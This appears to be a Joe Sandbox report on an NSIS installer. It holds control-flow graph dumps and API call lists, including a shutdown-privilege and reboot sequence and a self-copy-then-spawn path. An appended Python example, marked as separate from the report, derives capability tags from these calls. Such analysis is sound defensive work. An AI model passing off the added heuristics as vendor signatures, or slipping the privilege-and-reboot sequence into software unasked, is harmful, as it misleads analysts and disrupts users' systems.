402dcb 21 API calls 4792->4793 4794 40243b GetPrivateProfileStringW 4793->4794 4795 40201b 4796 402dcb 21 API calls 4795->4796 4797 402022 4796->4797 4798 4069ff 2 API calls 4797->4798 4799 402028 4798->4799 4801 402039 4799->4801 4802 4065e9 wsprintfW 4799->4802 4802->4801 4803 40569b 4804 4056ab 4803->4804 4805 4056bf 4803->4805 4806 4056b1 4804->4806 4807 405708 4804->4807 4808 4056c7 IsWindowVisible 4805->4808 4814 4056de 4805->4814 4810 40466d SendMessageW 4806->4810 4809 40570d CallWindowProcW 4807->4809 4808->4807 4811 4056d4 4808->4811 4812 4056bb 4809->4812 4810->4812 4813 404fdc 5 API calls 4811->4813 4813->4814 4814->4809 4815 40505c 4 API calls 4814->4815 4815->4807 4816 401b9c 4817 402dcb 21 API calls 4816->4817 4818 401ba3 4817->4818 4819 402da9 21 API calls 4818->4819 4820 401bac wsprintfW 4819->4820 4821 402c4f 4820->4821 4822 40149e 4823 4023c2 
4822->4823 4824 4014ac PostQuitMessage 4822->4824 4824->4823 3827 4016a0 3828 402dcb 21 API calls 3827->3828 3829 4016a7 3828->3829 3830 402dcb 21 API calls 3829->3830 3831 4016b0 3830->3831 3832 402dcb 21 API calls 3831->3832 3833 4016b9 MoveFileW 3832->3833 3834 4016cc 3833->3834 3835 4016c5 3833->3835 3836 4069ff 2 API calls 3834->3836 3839 40231b 3834->3839 3837 401423 28 API calls 3835->3837 3838 4016db 3836->3838 3837->3839 3838->3839 3840 406462 40 API calls 3838->3840 3840->3835 3841 404122 3842 40413a 3841->3842 3843 40429b 3841->3843 3842->3843 3844 404146 3842->3844 3845 4042ec 3843->3845 3846 4042ac GetDlgItem GetDlgItem 3843->3846 3848 404151 SetWindowPos 3844->3848 3849 404164 3844->3849 3847 404346 3845->3847 3858 401389 2 API calls 3845->3858 3850 404621 22 API calls 3846->3850 3904 404296 3847->3904 3912 40466d 3847->3912 3848->3849 3853 40416d ShowWindow 3849->3853 3854 4041af 3849->3854 3851 4042d6 SetClassLongW 3850->3851 3855 40140b 2 API calls 3851->3855 3859 40418d GetWindowLongW 3853->3859 3878 404259 3853->3878 3856 4041b7 DestroyWindow 3854->3856 3857 4041ce 3854->3857 3855->3845 3869 4045aa 3856->3869 3860 4041d3 SetWindowLongW 3857->3860 3861 4041e4 3857->3861 3862 40431e 3858->3862 3864 4041a6 ShowWindow 3859->3864 3859->3878 3860->3904 3866 4041f0 GetDlgItem 3861->3866 3861->3878 3862->3847 3867 404322 SendMessageW 3862->3867 3863 404688 8 API calls 3863->3904 3864->3854 3865 4045ac DestroyWindow KiUserCallbackDispatcher 3865->3869 3871 404201 SendMessageW IsWindowEnabled 3866->3871 3872 40421e 3866->3872 3867->3904 3868 40140b 2 API calls 3902 404358 3868->3902 3870 4045db ShowWindow 3869->3870 3869->3904 3870->3904 3871->3872 3871->3904 3874 40422b 3872->3874 3876 404272 SendMessageW 3872->3876 3877 40423e 3872->3877 3884 404223 3872->3884 3873 4066df 21 API calls 3873->3902 3874->3876 3874->3884 3876->3878 3879 404246 3877->3879 3880 40425b 3877->3880 3878->3863 3883 40140b 2 API calls 3879->3883 3882 40140b 2 API calls 3880->3882 
3881 404621 22 API calls 3881->3902 3882->3884 3883->3884 3884->3878 3921 4045fa 3884->3921 3885 404621 22 API calls 3886 4043d3 GetDlgItem 3885->3886 3887 4043f0 ShowWindow KiUserCallbackDispatcher 3886->3887 3888 4043e8 3886->3888 3915 404643 KiUserCallbackDispatcher 3887->3915 3888->3887 3890 40441a KiUserCallbackDispatcher 3895 40442e 3890->3895 3891 404433 GetSystemMenu EnableMenuItem SendMessageW 3892 404463 SendMessageW 3891->3892 3891->3895 3892->3895 3895->3891 3916 404656 SendMessageW 3895->3916 3917 404103 3895->3917 3920 4066a2 lstrcpynW 3895->3920 3897 404492 lstrlenW 3898 4066df 21 API calls 3897->3898 3899 4044a8 SetWindowTextW 3898->3899 3900 401389 2 API calls 3899->3900 3900->3902 3901 4044ec DestroyWindow 3901->3869 3903 404506 CreateDialogParamW 3901->3903 3902->3865 3902->3868 3902->3873 3902->3881 3902->3885 3902->3901 3902->3904 3903->3869 3905 404539 3903->3905 3906 404621 22 API calls 3905->3906 3907 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3906->3907 3908 401389 2 API calls 3907->3908 3909 40458a 3908->3909 3909->3904 3910 404592 ShowWindow 3909->3910 3911 40466d SendMessageW 3910->3911 3911->3869 3913 404685 3912->3913 3914 404676 SendMessageW 3912->3914 3913->3902 3914->3913 3915->3890 3916->3895 3918 4066df 21 API calls 3917->3918 3919 404111 SetWindowTextW 3918->3919 3919->3895 3920->3897 3922 404601 3921->3922 3923 404607 SendMessageW 3921->3923 3922->3923 3923->3878 3924 402324 3925 402dcb 21 API calls 3924->3925 3926 40232a 3925->3926 3927 402dcb 21 API calls 3926->3927 3928 402333 3927->3928 3929 402dcb 21 API calls 3928->3929 3930 40233c 3929->3930 3931 4069ff 2 API calls 3930->3931 3932 402345 3931->3932 3933 402356 lstrlenW lstrlenW 3932->3933 3937 402349 3932->3937 3935 405727 28 API calls 3933->3935 3934 405727 28 API calls 3938 402351 3934->3938 3936 402394 SHFileOperationW 3935->3936 3936->3937 3936->3938 3937->3934 3937->3938 4825 401a24 4826 402dcb 21 API calls 4825->4826 4827 401a2b 4826->4827 4828 
402dcb 21 API calls 4827->4828 4829 401a34 4828->4829 4830 401a3b lstrcmpiW 4829->4830 4831 401a4d lstrcmpW 4829->4831 4832 401a41 4830->4832 4831->4832 4237 401da6 4238 401db9 GetDlgItem 4237->4238 4239 401dac 4237->4239 4241 401db3 4238->4241 4240 402da9 21 API calls 4239->4240 4240->4241 4242 401dfa GetClientRect LoadImageW SendMessageW 4241->4242 4243 402dcb 21 API calls 4241->4243 4245 401e58 4242->4245 4247 401e64 4242->4247 4243->4242 4246 401e5d DeleteObject 4245->4246 4245->4247 4246->4247 4840 4023a8 4841 4023af 4840->4841 4844 4023c2 4840->4844 4842 4066df 21 API calls 4841->4842 4843 4023bc 4842->4843 4845 405d02 MessageBoxIndirectW 4843->4845 4845->4844 4846 402c2a SendMessageW 4847 402c44 InvalidateRect 4846->4847 4848 402c4f 4846->4848 4847->4848 4270 4024af 4271 402dcb 21 API calls 4270->4271 4272 4024c1 4271->4272 4273 402dcb 21 API calls 4272->4273 4274 4024cb 4273->4274 4287 402e5b 4274->4287 4277 402953 4278 402503 4280 40250f 4278->4280 4282 402da9 21 API calls 4278->4282 4279 402dcb 21 API calls 4281 4024f9 lstrlenW 4279->4281 4283 40252e RegSetValueExW 4280->4283 4284 403396 48 API calls 4280->4284 4281->4278 4282->4280 4285 402544 RegCloseKey 4283->4285 4284->4283 4285->4277 4288 402e76 4287->4288 4291 40653d 4288->4291 4292 40654c 4291->4292 4293 4024db 4292->4293 4294 406557 RegCreateKeyExW 4292->4294 4293->4277 4293->4278 4293->4279 4294->4293 4295 402930 4296 402dcb 21 API calls 4295->4296 4297 402937 FindFirstFileW 4296->4297 4298 40295f 4297->4298 4302 40294a 4297->4302 4299 402968 4298->4299 4303 4065e9 wsprintfW 4298->4303 4304 4066a2 lstrcpynW 4299->4304 4303->4299 4304->4302 4849 401931 4850 401968 4849->4850 4851 402dcb 21 API calls 4850->4851 4852 40196d 4851->4852 4853 405dae 71 API calls 4852->4853 4854 401976 4853->4854 4855 403d32 4856 403d3d 4855->4856 4857 403d41 4856->4857 4858 403d44 GlobalAlloc 4856->4858 4858->4857 4866 401934 4867 402dcb 21 API calls 4866->4867 4868 40193b 4867->4868 4869 405d02 MessageBoxIndirectW 
4868->4869 4870 401944 4869->4870 4335 4028b6 4336 4028bd 4335->4336 4338 402bce 4335->4338 4337 402da9 21 API calls 4336->4337 4339 4028c4 4337->4339 4340 4028d3 SetFilePointer 4339->4340 4340->4338 4341 4028e3 4340->4341 4343 4065e9 wsprintfW 4341->4343 4343->4338 4871 401f37 4872 402dcb 21 API calls 4871->4872 4873 401f3d 4872->4873 4874 402dcb 21 API calls 4873->4874 4875 401f46 4874->4875 4876 402dcb 21 API calls 4875->4876 4877 401f4f 4876->4877 4878 402dcb 21 API calls 4877->4878 4879 401f58 4878->4879 4880 401423 28 API calls 4879->4880 4881 401f5f 4880->4881 4888 405cc8 ShellExecuteExW 4881->4888 4883 401fa7 4884 406b41 5 API calls 4883->4884 4885 402953 4883->4885 4886 401fc4 CloseHandle 4884->4886 4886->4885 4888->4883 4344 402fb8 4345 402fe3 4344->4345 4346 402fca SetTimer 4344->4346 4347 403031 4345->4347 4348 403037 MulDiv 4345->4348 4346->4345 4349 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 4348->4349 4349->4347 4889 4014b8 4890 4014be 4889->4890 4891 401389 2 API calls 4890->4891 4892 4014c6 4891->4892 4893 401d3c 4894 402da9 21 API calls 4893->4894 4895 401d42 IsWindow 4894->4895 4896 401a45 4895->4896

Control-flow Graph

• Executed
• Not Executed

Control-flow graph of the function at 0x403665 (basic blocks 0x403665 through 0x403c7c). The per-block node and edge list is a graph rendering and is not reproduced here; the Windows APIs the blocks reach, roughly in call order, are: SetErrorMode; GetVersionExW (two blocks); lstrlenA; COMCTL32 ordinal #17 (InitCommonControls); OleInitialize; SHGetFileInfoW; GetCommandLineW; CharNextW in a command-line parsing loop; GetTempPathW, GetWindowsDirectoryW, lstrcatW and SetEnvironmentVariableW (twice) while choosing a temporary directory; DeleteFileW; ExitProcess and CoUninitialize on the normal exit path; GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges and ExitWindowsEx on the reboot path; and SetCurrentDirectoryW, CopyFileW, GetFileAttributesW, DeleteFileW, wsprintfW and CloseHandle on a path that copies a file and continues through the subroutines at 0x406462, 0x4066df and 0x405c85. ExitWindowsEx requires the shutdown privilege, which is what the OpenProcessToken / LookupPrivilegeValueW / AdjustTokenPrivileges sequence in front of it obtains; the privilege name itself is not visible in the graph.

APIs
• SetErrorMode.KERNEL32 ref: 00403688
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
• lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C (ordinal 17 is InitCommonControls)
• OleInitialize.OLE32(00000000), ref: 004037A3
• SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
• GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7 (the "NSIS Error" string identifies the stub as an NSIS installer)
• CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                                                                                              • lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                                                                                                              • lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                                                                                                              • DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                                                                                                              • lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                              • wsprintfW.USER32 ref: 00403AE4
                                                                                                                                              • GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
                                                                                                                                              • DeleteFileW.KERNEL32(00481000), ref: 00403B23
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
                                                                                                                                                • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                                                                                                              • CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
                                                                                                                                                • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
                                                                                                                                                • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                              • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
                                                                                                                                              • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403BD2
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403C7C
                                                                                                                                                • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                              • API String ID: 2017177436-2502969717
                                                                                                                                              • Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                              • Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
                                                                                                                                              • Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                              • Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 149 405866-405881 150 405a10-405a17 149->150 151 405887-40594e GetDlgItem * 3 call 404656 call 404faf GetClientRect GetSystemMetrics SendMessageW * 2 149->151 153 405a41-405a4e 150->153 154 405a19-405a3b GetDlgItem CreateThread CloseHandle 150->154 173 405950-40596a SendMessageW * 2 151->173 174 40596c-40596f 151->174 156 405a50-405a56 153->156 157 405a6c-405a76 153->157 154->153 161 405a91-405a9a call 404688 156->161 162 405a58-405a67 ShowWindow * 2 call 404656 156->162 158 405a78-405a7e 157->158 159 405acc-405ad0 157->159 163 405a80-405a8c call 4045fa 158->163 164 405aa6-405ab6 ShowWindow 158->164 159->161 167 405ad2-405ad8 159->167 170 405a9f-405aa3 161->170 162->157 163->161 171 405ac6-405ac7 call 4045fa 164->171 172 405ab8-405ac1 call 405727 164->172 167->161 175 405ada-405aed SendMessageW 167->175 171->159 172->171 173->174 178 405971-40597d SendMessageW 174->178 179 40597f-405996 call 404621 174->179 180 405af3-405b1e CreatePopupMenu call 4066df AppendMenuW 175->180 181 405bef-405bf1 175->181 178->179 188 405998-4059ac ShowWindow 179->188 189 4059cc-4059ed GetDlgItem SendMessageW 179->189 186 405b20-405b30 GetWindowRect 180->186 187 405b33-405b48 TrackPopupMenu 180->187 181->170 186->187 187->181 190 405b4e-405b65 187->190 191 4059bb 188->191 192 4059ae-4059b9 ShowWindow 188->192 189->181 193 4059f3-405a0b SendMessageW * 2 189->193 194 405b6a-405b85 SendMessageW 190->194 195 4059c1-4059c7 call 404656 191->195 192->195 193->181 194->194 196 405b87-405baa OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 195->189 198 405bac-405bd3 SendMessageW 196->198 198->198 199 405bd5-405be9 GlobalUnlock SetClipboardData CloseClipboard 198->199 199->181
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405910
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                                                                                                                • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405A5F
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405AAE
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405AF3
                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405B27
                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405B88
                                                                                                                                              • EmptyClipboard.USER32 ref: 00405B8E
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                                                                                                              • CloseClipboard.USER32 ref: 00405BE9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                              • String ID: H'D${
                                                                                                                                              • API String ID: 590372296-3538427676
                                                                                                                                              • Opcode ID: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                              • Instruction ID: a946544cda80648ae215d749a1304cfc675a42e6d6c1d5f97ef9608d1157b9e3
                                                                                                                                              • Opcode Fuzzy Hash: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                              • Instruction Fuzzy Hash: 0DB16770800608FFDF11AFA0DD859AE3B78EB48354F10413AFA45BA1A0D7785A41DF69
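The two API lists above (the NSIS stub entry point at 00403665 and the details-dialog procedure at 00405866) are the raw material the report's signature list is built from: SeShutdownPrivilege followed by AdjustTokenPrivileges and ExitWindowsEx is what backs "Contains functionality to shutdown / reboot the system", CopyFileW followed by CreateProcessW in a callee is the installer re-launching a copy of itself from the temp directory, and OpenClipboard/SetClipboardData is the details view's copy-to-clipboard handler. The following is an added example, not part of the Joe Sandbox report or of the analysed binary: it parses API bullet lines in the report's format into records, decodes the ExitWindowsEx flags, and derives capability tags from them. The sample lines are copied from this page; the tag names, the rule set and the helper names are this example's own choices, not Joe Sandbox's.

```python
"""Parse Joe Sandbox 'APIs' bullet lines and derive capability tags from them.

Added example; not part of the Joe Sandbox report or of the analysed sample.
Tag names and rules below are this example's own, not Joe Sandbox signatures.
"""
import re

# Report line shape:  "• Func.MODULE(arg,arg,...), ref: 00403688"
# Calls made by a callee carry a "Part of subcall function XXXX:" prefix.
_API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[#\w]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Sample input copied from the report's API list for the entry point at 00403665.
ENTRY_API_LINES = """\
• SetErrorMode.KERNEL32 ref: 00403688
• GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
• SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
• SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
• CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
  • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
"""

# Sample input copied from the report's API list for the dialog procedure at 00405866.
DIALOG_API_LINES = """\
• GetDlgItem.USER32(?,00000403), ref: 004058C4
• CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
• OpenClipboard.USER32(00000000), ref: 00405B88
• EmptyClipboard.USER32 ref: 00405B8E
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
• SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
• CloseClipboard.USER32 ref: 00405BE9
"""

# ExitWindowsEx uFlags bits (Win32 constants); 0 with no bit set is EWX_LOGOFF.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}


def parse_api_lines(text: str) -> list[dict]:
    """Turn API bullet lines into records; lines that do not match the shape are skipped."""
    records = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        records.append({"func": m["func"], "module": m["mod"].upper(), "args": args,
                        "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return records


def decode_exit_windows(args: list[str]) -> list[str]:
    """Name the uFlags bits of an ExitWindowsEx call; '?' (unknown arg) yields ['unknown']."""
    try:
        flags = int(args[0], 16)
    except (IndexError, ValueError):
        return ["unknown"]
    return [name for bit, name in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]


def tag_capabilities(records: list[dict]) -> set[str]:
    """Derive coarse capability tags from the set of calls, including callee calls."""
    funcs = {r["func"] for r in records}
    privs = {a for r in records if r["func"] == "LookupPrivilegeValueW"
             for a in r["args"] if a.startswith("Se")}
    env_vars = {r["args"][0] for r in records
                if r["func"] == "SetEnvironmentVariableW" and r["args"]}
    tags = set()
    if "ExitWindowsEx" in funcs or ("SeShutdownPrivilege" in privs
                                    and "AdjustTokenPrivileges" in funcs):
        tags.add("shutdown-or-reboot")
    if {"CopyFileW", "CreateProcessW"} <= funcs:   # self-copy then spawn
        tags.add("copies-file-then-spawns-process")
    if env_vars & {"TEMP", "TMP"}:
        tags.add("redirects-temp-dir")
    if "SetClipboardData" in funcs:
        tags.add("writes-clipboard")
    if "CreateThread" in funcs:
        tags.add("creates-thread")
    return tags


if __name__ == "__main__":
    for name, text in (("00403665", ENTRY_API_LINES), ("00405866", DIALOG_API_LINES)):
        recs = parse_api_lines(text)
        print(name, len(recs), "calls", sorted(tag_capabilities(recs)))
        for r in recs:
            if r["func"] == "ExitWindowsEx":
                print("  ExitWindowsEx flags:", decode_exit_windows(r["args"]))
```

The parser keeps callee calls (the "Part of subcall function" lines) as ordinary records with the callee address in `subcall`, which is what makes the CopyFileW/CreateProcessW pairing visible at the entry point even though CreateProcessW is actually issued from 00405C85. The ExitWindowsEx arguments in the report are 00000002 and 80040002, so the stub requests EWX_REBOOT; the second argument is the shutdown reason code, which the example does not decode.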

                                                                                                                                              Control-flow Graph

